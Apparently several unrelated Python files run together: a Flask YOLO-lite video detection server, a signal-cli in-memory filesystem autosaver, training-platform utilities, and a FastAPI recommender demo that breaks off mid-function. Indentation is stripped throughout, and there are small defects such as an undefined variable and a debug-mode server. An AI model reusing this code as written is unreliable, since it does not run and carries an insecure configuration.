metaMain = None
altNames = None
def performDetect(imagePath="test.jpg", thresh=0.5, configPath="./model/tiny-yolov2-trial13-noBatch.cfg", weightPath="./model/tiny-yolov2-trial13_noBatch.weights", metaPath="./model/voc.data", showImage=True, makeImageOnly=False, initOnly=False):
global metaMain, netMain, altNames #pylint: disable=W0603
assert 0 < thresh < 1, "Threshold should be a float between zero and one (non-inclusive)"
if not os.path.exists(configPath):
raise ValueError("Invalid config path `"+os.path.abspath(configPath)+"`")
if not os.path.exists(weightPath):
raise ValueError("Invalid weight path `"+os.path.abspath(weightPath)+"`")
if not os.path.exists(metaPath):
raise ValueError("Invalid data file path `"+os.path.abspath(metaPath)+"`")
if netMain is None:
netMain = load_net_custom(configPath.encode("ascii"), weightPath.encode("ascii"), 0, 1) # batch size = 1
if metaMain is None:
metaMain = load_meta(metaPath.encode("ascii"))
if altNames is None:
# In Python 3, the metafile default access craps out on Windows (but not Linux)
# Read the names file and create a list to feed to detect
try:
with open(metaPath) as metaFH:
metaContents = metaFH.read()
import re
match = re.search("names *= *(.*)$", metaContents, re.IGNORECASE | re.MULTILINE)
if match:
result = match.group(1)
else:
result = None
try:
if os.path.exists(result):
with open(result) as namesFH:
namesList = namesFH.read().strip().split("\n")
altNames = [x.strip() for x in namesList]
except TypeError:
pass
except Exception:
pass
if initOnly:
print("Initialized detector")
return None
if not os.path.exists(imagePath):
raise ValueError("Invalid image path `"+os.path.abspath(imagePath)+"`")
# Do the detection
#detections = detect(netMain, metaMain, imagePath, thresh) # if is used cv2.imread(image)
detections = detect(netMain, metaMain, imagePath.encode("ascii"), thresh)
if showImage:
try:
scale = 0.4
text_thickness = 1
line_type = 8
thickness=2
image = cv2.imread(imagePath)
print("*** "+str(len(detections))+" Results, color coded by confidence ***")
imcaption = []
img_prob = [0.0]*len(label_name)
for detection in detections:
label = detection[0]
confidence = detection[1]
pstring = label+": "+str(np.rint(100 * confidence))+"%"
img_prob[label_name.index(label)] = np.rint(100 * confidence)
imcaption.append(pstring)
print(pstring)
bounds = detection[2]
shape = image.shape
yExtent = int(bounds[3])
xEntent = int(bounds[2])
# Coordinates are around the center
xCoord = int(bounds[0] - bounds[2]/2)
yCoord = int(bounds[1] - bounds[3]/2)
color = colors_tableau[label_name.index(detection[0])]
p1 = (xCoord, yCoord)
p2 = (xCoord + xEntent,yCoord + yExtent)
if (p2[0] - p1[0] < 1) or (p2[1] - p1[1] < 1):
continue
cv2.rectangle(image, p1, p2, color, thickness)
text_size, baseline = cv2.getTextSize(pstring, cv2.FONT_HERSHEY_SIMPLEX, scale, text_thickness)
cv2.rectangle(image, (p1[0], p1[1] - thickness*10 - baseline), (p1[0] + 2*(text_size[0]-20), p1[1]), color, -1)
image = change_cv2_draw(image,pstring,(p1[0],p1[1]-7*baseline),20,(255,255,255))
except Exception as e:
print("Unable to show image: "+str(e))
return image, img_prob
#--------------------------falsk调用OpenCV和YOLO-lite------------------------------------
# index视图函数
@app.route("/", methods=['GET'])
def index():
return render_template("index.html")
def detect_yolo_lite():
'''
调用yolo-lite
'''
global vs, outputFrame, lock, probs
total = 0
while True:
ret,frame = vs.read()
total += 1
# frame = imutils.resize(frame, width=400)
# if total/10 == 0:
save_path = "./static/images/"+ temp_str + ".jpg"
cv2.imwrite(save_path,frame)
frame, probs = performDetect(imagePath=save_path)
# print(frame)
with lock: # 多线程的线程锁,确保当前线程的数据不被其他线程修改!
outputFrame = frame
def generate():
'''构建生成器
'''
global outputFrame, lock
while True:
with lock:
if outputFrame is None:
continue
(flag,encodedImage) = cv2.imencode(".jpg",outputFrame)
if not flag:
continue
yield(b"--frame\r\n" b"Content-Type:image/jpeg\r\n\r\n"+bytearray(encodedImage)+b"\r\n")
# 显示帧
@app.route("/video_feed")
def video_feed():
return Response(generate(),mimetype='multipart/x-mixed-replace;boundary=frame')
# ajax异步更新echarts数据
@app.route("/get_bar")
def get_bar():
global probs
bar = (
Bar()
.add_xaxis(label_name)
.add_yaxis("Detection Probs",probs)
)
# print(bar.render_embed())
# print(bar.dump_options())
# return render_template("index.html",bar_data=bar.dump_options())
# return bar.dump_options_with_quotes()
return bar.dump_options()
if __name__ == "__main__":
ap = argparse.ArgumentParser()
ap.add_argument("-i","--ip",type=str,required=True,help="IP")
ap.add_argument("-o","--port",type=int,required=True,help="port")
args = vars(ap.parse_args())
# 多线程
t = threading.Thread(target=detect_yolo_lite)
t.daemon = True
t.start()
app.run(host=args["ip"],port=args["port"],debug=True,threaded=True,
use_reloader=False)
#release视频流
vs.stop()
|
autosave.py
|
#!/usr/bin/python3.9
# Copyright (c) 2021 MobileCoin Inc.
# Copyright (c) 2021 The Forest Team
import asyncio
import logging
import os
import time
from pathlib import Path
from subprocess import PIPE, Popen
from typing import Any
import aioprocessing
from aiohttp import web
from forest import fuse, mem, utils
_memfs_process = None
# this is the first thing that runs on aiohttp app startup, before datastore.download
async def start_memfs(app: web.Application) -> None:
"""
mount a filesystem in userspace to store data
the fs contents are stored in memory, so that our keys never touch a disk
this means we can log signal-cli's interactions with fs,
and store them in mem_queue.
"""
logging.info("starting memfs")
app["mem_queue"] = mem_queue = aioprocessing.AioQueue()
if not os.path.exists("/dev/fuse"):
# you *must* have fuse already loaded if running locally
proc = Popen(
["/usr/sbin/insmod", "/app/fuse.ko"],
stdout=PIPE,
stderr=PIPE,
)
proc.wait()
(stdout, stderr) = proc.communicate() # pylint: disable=unused-variable
if stderr:
raise Exception(
f"Could not load fuse module! You may need to recompile.\t\n{stderr.decode()}"
)
def memfs_proc(path: str = "data") -> Any:
"""Start the memfs process"""
mountpath = Path(utils.ROOT_DIR) / path
logging.info("Starting memfs with PID: %s on dir: %s", os.getpid(), mountpath)
backend = mem.Memory(logqueue=mem_queue) # type: ignore
logging.info("mountpoint already exists: %s", mountpath.exists())
Path(utils.ROOT_DIR).mkdir(exist_ok=True, parents=True)
return fuse.FUSE(operations=backend, mountpoint=utils.ROOT_DIR + "/data") # type: ignore
async def launch() -> None:
logging.info("about to launch memfs with aioprocessing")
memfs = aioprocessing.AioProcess(target=memfs_proc)
memfs.start() # pylint: disable=no-member
app["memfs"] = memfs
_memfs_process = memfs
await launch()
# input, operation, path, arguments, caller
# ["->", "fsync", "/+14703226669", "(1, 2)", "/app/signal-cli", ["/app/signal-cli", "--config", "/app", "--username=+14703226669", "--output=json", "stdio", ""], 0, 0, 523]
# ["<-", "fsync", "0"]
async def start_memfs_monitor(app: web.Application) -> None:
"""
monitor the memfs activity queue for file saves, sync with supabase
"""
async def upload_after_signalcli_writes() -> None:
queue = app.get("mem_queue")
if not queue:
logging.info("no mem_queue, nothing to monitor")
return
logging.info("monitoring memfs")
counter = 0
while True:
queue_item = await queue.coro_get()
# iff fsync triggered by signal-cli
if queue_item[0:2] == ["->", "fsync"] and "-cli" in queue_item[5][0]:
# /+14703226669
# file_to_sync = queue_item[2]
# 14703226669
maybe_session = app.get("session")
if maybe_session:
counter += 1
if time.time() % (60 * 3) == 0:
logging.info("background syncs in the past ~3min: %s", counter)
counter = 0
await maybe_session.datastore.upload()
app["mem_task"] = asyncio.create_task(upload_after_signalcli_writes())
|
utils.py
|
import psutil
import shutil
import os
import os.path as osp
from enum import Enum
import multiprocessing as mp
from queue import Queue
import time
import threading
from ctypes import CDLL, c_char, c_uint, c_ulonglong
from _ctypes import byref, Structure, POINTER
import platform
import string
import logging
import socket
import logging.handlers
import requests
import json
from json import JSONEncoder
class CustomEncoder(JSONEncoder):
def default(self, o):
return o.__dict__
class ShareData():
workspace = None
workspace_dir = ""
has_gpu = True
monitored_processes = mp.Queue(4096)
current_port = 8000
running_boards = {}
machine_info = dict()
load_demo_proc_dict = {}
load_demo_proj_data_dict = {}
DatasetStatus = Enum(
'DatasetStatus', ('XEMPTY', 'XCHECKING', 'XCHECKFAIL', 'XCOPYING',
'XCOPYDONE', 'XCOPYFAIL', 'XSPLITED'),
start=0)
TaskStatus = Enum(
'TaskStatus', ('XUNINIT', 'XINIT', 'XDOWNLOADING', 'XTRAINING',
'XTRAINDONE', 'XEVALUATED', 'XEXPORTING', 'XEXPORTED',
'XTRAINEXIT', 'XDOWNLOADFAIL', 'XTRAINFAIL', 'XEVALUATING',
'XEVALUATEFAIL', 'XEXPORTFAIL', 'XPRUNEING', 'XPRUNETRAIN'),
start=0)
ProjectType = Enum(
'ProjectType', ('classification', 'detection', 'segmentation',
'instance_segmentation', 'remote_segmentation'),
start=0)
DownloadStatus = Enum(
'DownloadStatus',
('XDDOWNLOADING', 'XDDOWNLOADFAIL', 'XDDOWNLOADDONE', 'XDDECOMPRESSED'),
start=0)
PredictStatus = Enum(
'PredictStatus', ('XPRESTART', 'XPREDONE', 'XPREFAIL'), start=0)
PruneStatus = Enum(
'PruneStatus', ('XSPRUNESTART', 'XSPRUNEING', 'XSPRUNEDONE', 'XSPRUNEFAIL',
'XSPRUNEEXIT'),
start=0)
PretrainedModelStatus = Enum(
'PretrainedModelStatus',
('XPINIT', 'XPSAVING', 'XPSAVEFAIL', 'XPSAVEDONE'),
start=0)
ExportedModelType = Enum(
'ExportedModelType', ('XQUANTMOBILE', 'XPRUNEMOBILE', 'XTRAINMOBILE',
'XQUANTSERVER', 'XPRUNESERVER', 'XTRAINSERVER'),
start=0)
process_pool = Queue(1000)
def get_ip():
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(('8.8.8.8', 80))
ip = s.getsockname()[0]
finally:
s.close()
return ip
def get_logger(filename):
flask_logger = logging.getLogger()
flask_logger.setLevel(level=logging.INFO)
fmt = '%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s:%(message)s'
format_str = logging.Formatter(fmt)
ch = logging.StreamHandler()
ch.setLevel(level=logging.INFO)
ch.setFormatter(format_str)
th = logging.handlers.TimedRotatingFileHandler(
filename=filename, when='D', backupCount=5, encoding='utf-8')
th.setFormatter(format_str)
flask_logger.addHandler(th)
flask_logger.addHandler(ch)
return flask_logger
def start_process(target, args):
global process_pool
p = mp.Process(target=target, args=args)
p.start()
process_pool.put(p)
def pkill(pid):
"""结束进程pid,和与其相关的子进程
Args:
pid(int): 进程id
"""
try:
parent = psutil.Process(pid)
for child in parent.children(recursive=True):
child.kill()
parent.kill()
except:
print("Try to kill process {} failed.".format(pid))
def set_folder_status(dirname, status, message=""):
"""设置目录状态
Args:
dirname(str): 目录路径
status(DatasetStatus): 状态
message(str): 需要写到状态文件里的信息
"""
if not osp.isdir(dirname):
raise Exception("目录路径{}不存在".format(dirname))
tmp_file = osp.join(dirname, status.name + '.tmp')
with open(tmp_file, 'w', encoding='utf-8') as f:
f.write("{}\n".format(message))
shutil.move(tmp_file, osp.join(dirname, status.name))
for status_type in [
DatasetStatus, TaskStatus, PredictStatus, PruneStatus,
DownloadStatus, PretrainedModelStatus
]:
for s in status_type:
if s == status:
continue
if osp.exists(osp.join(dirname, s.name)):
os.remove(osp.join(dirname, s.name))
def get_folder_status(dirname, with_message=False):
"""获取目录状态
Args:
dirname(str): 目录路径
with_message(bool): 是否需要返回状态文件内的信息
"""
status = None
closest_time = 0
message = ''
for status_type in [
DatasetStatus, TaskStatus, PredictStatus, PruneStatus,
DownloadStatus, PretrainedModelStatus
]:
for s in status_type:
if osp.exists(osp.join(dirname, s.name)):
modify_time = os.stat(osp.join(dirname, s.name)).st_mtime
if modify_time > closest_time:
closest_time = modify_time
status = getattr(status_type, s.name)
if with_message:
encoding = 'utf-8'
try:
f = open(
osp.join(dirname, s.name),
'r',
encoding=encoding)
message = f.read()
f.close()
except:
try:
import chardet
f = open(filename, 'rb')
data = f.read()
f.close()
encoding = chardet.detect(data).get('encoding')
f = open(
osp.join(dirname, s.name),
'r',
encoding=encoding)
message = f.read()
f.close()
except:
pass
if with_message:
return status, message
return status
def _machine_check_proc(queue, path):
info = dict()
p = PyNvml()
gpu_num = 0
try:
# import paddle.fluid.core as core
# gpu_num = core.get_cuda_device_count()
p.nvml_init(path)
gpu_num = p.nvml_device_get_count()
driver_version = bytes.decode(p.nvml_system_get_driver_version())
except:
driver_version = "N/A"
info['gpu_num'] = gpu_num
info['gpu_free_mem'] = list()
try:
for i in range(gpu_num):
handle = p.nvml_device_get_handle_by_index(i)
meminfo = p.nvml_device_get_memory_info(handle)
free_mem = meminfo.free / 1024 / 1024
info['gpu_free_mem'].append(free_mem)
except:
pass
info['cpu_num'] = os.environ.get('CPU_NUM', 1)
info['driver_version'] = driver_version
info['path'] = p.nvml_lib_path
queue.put(info, timeout=2)
def get_machine_info(path=None):
queue = mp.Queue(1)
p = mp.Process(target=_machine_check_proc, args=(queue, path))
p.start()
p.join()
return queue.get(timeout=2)
def download(url, target_path):
if not osp.exists(target_path):
os.makedirs(target_path)
fname = osp.split(url)[-1]
fullname = osp.join(target_path, fname)
retry_cnt = 0
DOWNLOAD_RETRY_LIMIT = 3
while not (osp.exists(fullname)):
if retry_cnt < DOWNLOAD_RETRY_LIMIT:
retry_cnt += 1
else:
# 设置下载失败
msg = "Download from {} failed. Retry limit reached".format(url)
set_folder_status(target_path, DownloadStatus.XDDOWNLOADFAIL, msg)
raise RuntimeError(msg)
req = requests.get(url, stream=True)
if req.status_code != 200:
msg = "Downloading from {} failed with code {}!".format(
url, req.status_code)
set_folder_status(target_path, DownloadStatus.XDDOWNLOADFAIL, msg)
raise RuntimeError(msg)
# For protecting download interupted, download to
# tmp_fullname firstly, move tmp_fullname to fullname
# after download finished
tmp_fullname = fullname + "_tmp"
total_size = req.headers.get('content-length')
set_folder_status(target_path, DownloadStatus.XDDOWNLOADING,
total_size)
with open(tmp_fullname, 'wb') as f:
if total_size:
download_size = 0
for chunk in req.iter_content(chunk_size=1024):
f.write(chunk)
download_size += 1024
else:
for chunk in req.iter_content(chunk_size=1024):
if chunk:
f.write(chunk)
shutil.move(tmp_fullname, fullname)
set_folder_status(target_path, DownloadStatus.XDDOWNLOADDONE)
return fullname
def is_pic(filename):
suffixes = {'JPEG', 'jpeg', 'JPG', 'jpg', 'BMP', 'bmp', 'PNG', 'png'}
suffix = filename.strip().split('.')[-1]
if suffix not in suffixes:
return False
return True
def is_available(ip, port):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((ip, int(port)))
s.shutdown(2)
return False
except:
return True
def list_files(dirname):
""" 列出目录下所有文件(包括所属的一级子目录下文件)
Args:
dirname: 目录路径
"""
def filter_file(f):
if f.startswith('.'):
return True
if hasattr(PretrainedModelStatus, f):
return True
return False
all_files = list()
dirs = list()
for f in os.listdir(dirname):
if filter_file(f):
continue
if osp.isdir(osp.join(dirname, f)):
dirs.append(f)
else:
all_files.append(f)
for d in dirs:
for f in os.listdir(osp.join(dirname, d)):
if filter_file(f):
continue
if osp.isdir(osp.join(dirname, d, f)):
continue
all_files.append(osp.join(d, f))
return all_files
def copy_model_directory(src, dst, files=None, filter_files=[]):
"""从src目录copy文件至dst目录,
注意:拷贝前会先清空dst中的所有文件
Args:
src: 源目录路径
dst: 目标目录路径
files: 需要拷贝的文件列表(src的相对路径)
"""
set_folder_status(dst, PretrainedModelStatus.XPSAVING, os.getpid())
if files is None:
files = list_files(src)
try:
message = '{} {}'.format(os.getpid(), len(files))
set_folder_status(dst, PretrainedModelStatus.XPSAVING, message)
if not osp.samefile(src, dst):
for i, f in enumerate(files):
items = osp.split(f)
if len(items) > 2:
continue
if len(items) == 2:
if not osp.isdir(osp.join(dst, items[0])):
if osp.exists(osp.join(dst, items[0])):
os.remove(osp.join(dst, items[0]))
os.makedirs(osp.join(dst, items[0]))
if f not in filter_files:
shutil.copy(osp.join(src, f), osp.join(dst, f))
set_folder_status(dst, PretrainedModelStatus.XPSAVEDONE)
except Exception as e:
import traceback
error_info = traceback.format_exc()
set_folder_status(dst, PretrainedModelStatus.XPSAVEFAIL, error_info)
def copy_pretrained_model(src, dst):
p = mp.Process(
target=copy_model_directory, args=(src, dst, None, ['model.pdopt']))
p.start()
return p
def _get_gpu_info(queue):
gpu_info = dict()
mem_free = list()
mem_used = list()
mem_total = list()
import pycuda.driver as drv
from pycuda.tools import clear_context_caches
drv.init()
driver_version = drv.get_driver_version()
gpu_num = drv.Device.count()
for gpu_id in range(gpu_num):
dev = drv.Device(gpu_id)
try:
context = dev.make_context()
free, total = drv.mem_get_info()
context.pop()
free = free // 1024 // 1024
total = total // 1024 // 1024
used = total - free
except:
free = 0
total = 0
used = 0
mem_free.append(free)
mem_used.append(used)
mem_total.append(total)
gpu_info['mem_free'] = mem_free
gpu_info['mem_used'] = mem_used
gpu_info['mem_total'] = mem_total
gpu_info['driver_version'] = driver_version
gpu_info['gpu_num'] = gpu_num
queue.put(gpu_info)
def get_gpu_info():
try:
import pycuda
except:
gpu_info = dict()
message = "未检测到GPU \n 若存在GPU请确保安装pycuda \n 若未安装pycuda请使用'pip install pycuda'来安装"
gpu_info['gpu_num'] = 0
return gpu_info, message
queue = mp.Queue(1)
p = mp.Process(target=_get_gpu_info, args=(queue, ))
p.start()
p.join()
gpu_info = queue.get(timeout=2)
if gpu_info['gpu_num'] == 0:
message = "未检测到GPU"
else:
message = "检测到GPU"
return gpu_info, message
class TrainLogReader(object):
def __init__(self, log_file):
self.log_file = log_file
self.eta = None
self.train_metrics = None
self.eval_metrics = None
self.download_status = None
self.eval_done = False
self.train_error = None
self.train_stage = None
self.running_duration = None
def update(self):
if not osp.exists(self.log_file):
return
if self.train_stage == "Train Error":
return
if self.download_status == "Failed":
return
if self.train_stage == "Train Complete":
return
logs = open(self.log_file, encoding='utf-8').read().strip().split('\n')
self.eta = None
self.train_metrics = None
self.eval_metrics = None
if self.download_status != "Done":
self.download_status = None
start_time_timestamp = osp.getctime(self.log_file)
for line in logs[::1]:
try:
start_time_str = " ".join(line.split()[0:2])
start_time_array = time.strptime(start_time_str,
"%Y-%m-%d %H:%M:%S")
start_time_timestamp = time.mktime(start_time_array)
break
except Exception as e:
pass
for line in logs[::-1]:
if line.count('Train Complete!'):
self.train_stage = "Train Complete"
if line.count('Training stop with error!'):
self.train_error = line
if self.train_metrics is not None \
and self.eval_metrics is not None and self.eval_done and self.eta is not None:
break
items = line.strip().split()
if line.count('Model saved in'):
self.eval_done = True
if line.count('download completed'):
self.download_status = 'Done'
break
if line.count('download failed'):
self.download_status = 'Failed'
break
if self.download_status != 'Done':
if line.count('[DEBUG]\tDownloading'
) and self.download_status is None:
self.download_status = dict()
if not line.endswith('KB/s'):
continue
speed = items[-1].strip('KB/s').split('=')[-1]
download = items[-2].strip('M, ').split('=')[-1]
total = items[-3].strip('M, ').split('=')[-1]
self.download_status['speed'] = speed
self.download_status['download'] = float(download)
self.download_status['total'] = float(total)
if self.eta is None:
if line.count('eta') > 0 and (line[-3] == ':' or
line[-4] == ':'):
eta = items[-1].strip().split('=')[1]
h, m, s = [int(x) for x in eta.split(':')]
self.eta = h * 3600 + m * 60 + s
if self.train_metrics is None:
if line.count('[INFO]\t[TRAIN]') > 0 and line.count(
'Step') > 0:
if not items[-1].startswith('eta'):
continue
self.train_metrics = dict()
metrics = items[4:]
for metric in metrics:
try:
name, value = metric.strip(', ').split('=')
value = value.split('/')[0]
if value.count('.') > 0:
value = float(value)
elif value == 'nan':
value = 'nan'
else:
value = int(value)
self.train_metrics[name] = value
except:
pass
if self.eval_metrics is None:
if line.count('[INFO]\t[EVAL]') > 0 and line.count(
'Finished') > 0:
if not line.strip().endswith(' .'):
continue
self.eval_metrics = dict()
metrics = items[5:]
for metric in metrics:
try:
name, value = metric.strip(', ').split('=')
value = value.split('/')[0]
if value.count('.') > 0:
value = float(value)
else:
value = int(value)
self.eval_metrics[name] = value
except:
pass
end_time_timestamp = osp.getmtime(self.log_file)
t_diff = time.gmtime(end_time_timestamp - start_time_timestamp)
self.running_duration = "{}小时{}分{}秒".format(
t_diff.tm_hour, t_diff.tm_min, t_diff.tm_sec)
class PruneLogReader(object):
def init_attr(self):
self.eta = None
self.iters = None
self.current = None
self.progress = None
def __init__(self, log_file):
self.log_file = log_file
self.init_attr()
def update(self):
if not osp.exists(self.log_file):
return
logs = open(self.log_file, encoding='utf-8').read().strip().split('\n')
self.init_attr()
for line in logs[::-1]:
metric_loaded = True
for k, v in self.__dict__.items():
if v is None:
metric_loaded = False
break
if metric_loaded:
break
if line.count("Total evaluate iters") > 0:
items = line.split(',')
for item in items:
kv_list = item.strip().split()[-1].split('=')
kv_list = [v.strip() for v in kv_list]
setattr(self, kv_list[0], kv_list[1])
class QuantLogReader:
def __init__(self, log_file):
self.log_file = log_file
self.stage = None
self.running_duration = None
def update(self):
if not osp.exists(self.log_file):
return
logs = open(self.log_file, encoding='utf-8').read().strip().split('\n')
for line in logs[::-1]:
items = line.strip().split(' ')
if line.count('[Run batch data]'):
info = items[-3][:-1].split('=')[1]
batch_id = float(info.split('/')[0])
batch_all = float(info.split('/')[1])
self.running_duration = \
batch_id / batch_all * (10.0 / 30.0)
self.stage = 'Batch'
break
elif line.count('[Calculate weight]'):
info = items[-3][:-1].split('=')[1]
weight_id = float(info.split('/')[0])
weight_all = float(info.split('/')[1])
self.running_duration = \
weight_id / weight_all * (3.0 / 30.0) + (10.0 / 30.0)
self.stage = 'Weight'
break
elif line.count('[Calculate activation]'):
info = items[-3][:-1].split('=')[1]
activation_id = float(info.split('/')[0])
activation_all = float(info.split('/')[1])
self.running_duration = \
activation_id / activation_all * (16.0 / 30.0) + (13.0 / 30.0)
self.stage = 'Activation'
break
elif line.count('Finish quant!'):
self.stage = 'Finish'
break
class PyNvml(object):
""" Nvidia GPU驱动检测类,可检测当前GPU驱动版本"""
class PrintableStructure(Structure):
_fmt_ = {}
def __str__(self):
result = []
for x in self._fields_:
key = x[0]
value = getattr(self, key)
fmt = "%s"
if key in self._fmt_:
fmt = self._fmt_[key]
elif "<default>" in self._fmt_:
fmt = self._fmt_["<default>"]
result.append(("%s: " + fmt) % (key, value))
return self.__class__.__name__ + "(" + string.join(result,
", ") + ")"
class c_nvmlMemory_t(PrintableStructure):
_fields_ = [
('total', c_ulonglong),
('free', c_ulonglong),
('used', c_ulonglong),
]
_fmt_ = {'<default>': "%d B"}
## Device structures
class struct_c_nvmlDevice_t(Structure):
pass # opaque handle
c_nvmlDevice_t = POINTER(struct_c_nvmlDevice_t)
def __init__(self):
self.nvml_lib = None
self.nvml_lib_refcount = 0
self.lib_load_lock = threading.Lock()
self.nvml_lib_path = None
def nvml_init(self, nvml_lib_path=None):
self.lib_load_lock.acquire()
sysstr = platform.system()
if nvml_lib_path is None or nvml_lib_path.strip() == "":
if sysstr == "Windows":
nvml_lib_path = osp.join(
os.getenv("ProgramFiles", "C:/Program Files"),
"NVIDIA Corporation/NVSMI")
if not osp.exists(osp.join(nvml_lib_path, "nvml.dll")):
nvml_lib_path = "C:\\Windows\\System32"
elif sysstr == "Linux":
p1 = "/usr/lib/x86_64-linux-gnu"
p2 = "/usr/lib/i386-linux-gnu"
if osp.exists(osp.join(p1, "libnvidia-ml.so.1")):
nvml_lib_path = p1
elif osp.exists(osp.join(p2, "libnvidia-ml.so.1")):
nvml_lib_path = p2
else:
nvml_lib_path = ""
else:
nvml_lib_path = "N/A"
nvml_lib_dir = nvml_lib_path
if sysstr == "Windows":
nvml_lib_path = osp.join(nvml_lib_dir, "nvml.dll")
else:
nvml_lib_path = osp.join(nvml_lib_dir, "libnvidia-ml.so.1")
self.nvml_lib_path = nvml_lib_path
try:
self.nvml_lib = CDLL(nvml_lib_path)
fn = self._get_fn_ptr("nvmlInit_v2")
fn()
if sysstr == "Windows":
driver_version = bytes.decode(
self.nvml_system_get_driver_version())
if driver_version.strip() == "":
nvml_lib_path = osp.join(nvml_lib_dir, "nvml9.dll")
self.nvml_lib = CDLL(nvml_lib_path)
fn = self._get_fn_ptr("nvmlInit_v2")
fn()
except Exception as e:
raise e
finally:
self.lib_load_lock.release()
self.lib_load_lock.acquire()
self.nvml_lib_refcount += 1
self.lib_load_lock.release()
def create_string_buffer(self, init, size=None):
if isinstance(init, bytes):
if size is None:
size = len(init) + 1
buftype = c_char * size
buf = buftype()
buf.value = init
return buf
elif isinstance(init, int):
buftype = c_char * init
buf = buftype()
return buf
raise TypeError(init)
def _get_fn_ptr(self, name):
return getattr(self.nvml_lib, name)
def nvml_system_get_driver_version(self):
c_version = self.create_string_buffer(81)
fn = self._get_fn_ptr("nvmlSystemGetDriverVersion")
ret = fn(c_version, c_uint(81))
return c_version.value
def nvml_device_get_count(self):
c_count = c_uint()
fn = self._get_fn_ptr("nvmlDeviceGetCount_v2")
ret = fn(byref(c_count))
return c_count.value
def nvml_device_get_handle_by_index(self, index):
c_index = c_uint(index)
device = PyNvml.c_nvmlDevice_t()
fn = self._get_fn_ptr("nvmlDeviceGetHandleByIndex_v2")
ret = fn(c_index, byref(device))
return device
def nvml_device_get_memory_info(self, handle):
c_memory = PyNvml.c_nvmlMemory_t()
fn = self._get_fn_ptr("nvmlDeviceGetMemoryInfo")
ret = fn(handle, byref(c_memory))
return c_memory
|
server.py
|
import json
import logging
import os
import uuid
from typing import List
import sys
import cache
import math
import base64
from random import randint
from multiprocessing import Process, Pool
from threading import Thread
import boto3
import botocore
import requests
import uvicorn as uvicorn
from fastapi import FastAPI, Header, HTTPException, APIRouter, Depends
from fastapi.exceptions import RequestValidationError
from pydantic import BaseModel
import random
import calendar
import time
from bs4 import BeautifulSoup
from functools import partial, total_ordering
from requests import ConnectTimeout
from typing import Optional
from fastapi.responses import JSONResponse
class LoginRequest(BaseModel):
userId: str
userName: Optional[str] = None
class TrainRequest(BaseModel):
change_type: str
class URLRequest(BaseModel):
title: str
class ClickRequest(BaseModel):
userId: str
itemId: str
class LoadMessage(BaseModel):
file_type: str
file_path: str
file_name: list = []
class LoadRequest(BaseModel):
message: LoadMessage = None
app = FastAPI()
MANDATORY_ENV_VARS = {
'DEMO_PORT': 5900,
'REDIS_HOST': 'localhost',
'REDIS_PORT': 6379,
'EVENT_SERVICE_ENDPOINT': 'http://event:5100',
'RETRIEVE_SERVICE_ENDPOINT': 'http://retrieve:5600',
'LOCAL_DATA_FOLDER': '/tmp/rs-data/',
'S3_BUCKET': 'aws-gcr-rs-sol-demo-ap-southeast-1-522244679887',
'S3_PREFIX': 'sample-data',
'AWS_REGION': 'ap-southeast-1',
'CLICK_RECORD_BUCKET': 'gcr-rs-ops-ap-southeast-1-522244679887',
'CLICK_RECORD_FILE_PATH': 'system/ingest-data/action/',
'USER_RECORD_FILE_PATH': 'system/ingest-data/user/',
'TEST': ''
}
REDIS_KEY_USER_ID_CLICK_DICT = 'user_id_click_dict'
REDIS_KEY_USER_LOGIN_DICT = 'user_login_dict'
TRIGGER_RECALL_WINDOW = 3
news_records_dict = 'news_records_dict'
movie_records_dict = 'movie_records_dict'
user_id_action_dict = 'user_id_action_dict'
lNewsCfgCompleteType = ['news_story', 'news_culture', 'news_entertainment', 'news_sports', 'news_finance', 'news_house',
'news_car', 'news_edu', 'news_tech', 'news_military', 'news_travel', 'news_world', 'news_agriculture', 'news_game']
def xasync(f):
def wrapper(*args, **kwargs):
thr = Thread(target=f, args=args, kwargs=kwargs)
thr.start()
return wrapper
@app.get('/api/v1/demo/dashboard', tags=["demo"])
def get_dashboard_data():
logging.info('Start demo->get_dashboard_data()...')
s3_bucket = MANDATORY_ENV_VARS['S3_BUCKET']
s3_prefix = MANDATORY_ENV_VARS['S3_PREFIX']
file_name = 'system/dashboard/dashboard.json'
file_key = os.path.join(s3_prefix, file_name)
s3 = boto3.resource('s3')
object_str = s3.Object(s3_bucket, file_key).get()[
'Body'].read().decode('utf-8')
json_data = json.loads(object_str)
return response_success(json_data)
# notice demo service to load news record data
@app.post('/api/v1/demo/notice', tags=["demo"])
def notice(loadRequest: LoadRequest):
logging.info('Start demo->notice()...')
loader_message = loadRequest.message
file_type = loader_message.file_type
file_path = loader_message.file_path
file_list = loader_message.file_name
logging.info('file type:{}, file_path:{}, file_list:{}'.format(
file_type, file_path, file_list))
if not os.path.exists(MANDATORY_ENV_VARS['LOCAL_DATA_FOLDER']):
logging.info("the local path {} is not existed".format(MANDATORY_ENV_VARS['LOCAL_DATA_FOLDER']))
os.mkdir(MANDATORY_ENV_VARS['LOCAL_DATA_FOLDER'])
if file_type == 'news_records':
for file in file_list:
init_news_records_data(file_type, file_path, file, news_records_dict)
elif file_type == 'movie_records':
for file in file_list:
init_movie_records_data(file_type, file_path, file, movie_records_dict)
return json.dumps({'result': 'success'}), 200, {'ContentType': 'application/json'}
@app.post('/api/v1/demo/login', tags=["demo"])
def login(loginRequest: LoginRequest):
logging.info('Start demo->login()...')
user_id = loginRequest.userId
user_name = loginRequest.userName
if user_name == None:
s3_body = ''
current_timestamp = str(calendar.timegm(time.gmtime()))
temp_array = []
temp_array.append(user_id)
temp_array.append(get_random_sex())
temp_array.append(get_random_age())
temp_array.append(current_timestamp)
temp_array.append('anonymous')
connector = '_!_'
s3_body = connector.join(temp_array)
logging.info("store anonymous user data{} ".format(s3_body))
s3client = boto3.resource('s3')
if s3_body != '':
s3client.Bucket(MANDATORY_ENV_VARS['CLICK_RECORD_BUCKET']).put_object(
Key=MANDATORY_ENV_VARS['USER_RECORD_FILE_PATH'] + 'user_' + user_id + '_' + current_timestamp + '.csv',
Body=s3_body)
#AddUser to AWS Personalize
call_personalize_add_user(user_id, temp_array[1])
return response_success({
"message": "Login as anonymous user!",
"data": {
"userId": user_id,
"visitCount": 1
}
})
user_id_in_sever = get_user_id_by_name(user_name)
logging.info(
'login_post() - user_id_in_sever: {}'.format(user_id_in_sever))
if not user_id_in_sever:
s3_body = ''
current_timestamp = str(calendar.timegm(time.gmtime()))
temp_array = []
temp_array.append(user_id)
temp_array.append(get_random_sex())
temp_array.append(get_random_age())
temp_array.append(current_timestamp)
temp_array.append(user_name)
connector = '_!_'
